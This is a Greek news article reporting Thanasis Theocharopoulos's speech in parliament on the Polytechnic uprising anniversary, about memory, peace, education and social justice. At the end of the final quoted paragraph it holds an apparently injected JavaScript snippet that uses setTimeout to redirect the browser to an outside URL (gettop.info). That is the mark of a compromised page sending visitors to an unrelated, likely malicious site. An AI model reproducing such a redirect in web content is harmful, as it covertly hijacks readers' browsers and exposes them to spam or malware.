Θεοχαρόπουλος: Χρέος όλων μας η μνήμη να νικά πάντοτε τη λήθη

0
10

 

Στην Ολομέλεια της Βουλής, κατά τη διάρκεια της εκδήλωσης για το Πολυτεχνείο, εκ μέρους της Δημοκρατικής Συμπαράταξης, ο επικεφαλής της ΔΗΜΑΡ, Θανάσης Θεοχαρόπουλο σημείωσε: «Στην επέτειο της εξέγερσης του Πολυτεχνείου χρέος όλων μας είναι η μνήμη να νικά πάντοτε τη λήθη».

Όπως τόνισε η έκβαση της αναμέτρησης ανάμεσα στη μνήμη και τη λήθη, σφραγίζει πάντοτε τις κοινωνίες και προσδιορίζει το μέλλον τους. «Ωστόσο, η μνήμη δεν πρέπει να περιορίζεται σε επετειακές αναφορές. Η επιμονή στη μνήμη οφείλει να είναι η αρχή και η ελπίδα για έναν διαρκή, για έναν ασυμβίβαστο αγώνα για την επικράτηση της ειρήνης, για το δικαίωμα στην παιδεία και την εργασία, την κοινωνική δικαιοσύνη», πρόσθεσε.

Ο κ. Θεοχαρόπουλος ανέφερε ότι οφείλουμε να αντλούμε δύναμη από το παρελθόν και να επεκτείνουμε τους αγώνες της γενιάς του Πολυτεχνείου. «Σε αυτήν τη δύσκολη συγκυρία που βρίσκεται σήμερα η χώρα μας, παγιδευμένη σε μία παρατεταμένη και βαθιά κρίση, η ιστορική αυτή παρακαταθήκη των αγώνων της νεολαίας προσφέρεται ως μία αφορμή συλλογικής αυτογνωσίας, αποτελεί ευκαιρία για αναστοχασμό, για να προκύψουν νέοι αγώνες», είπε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here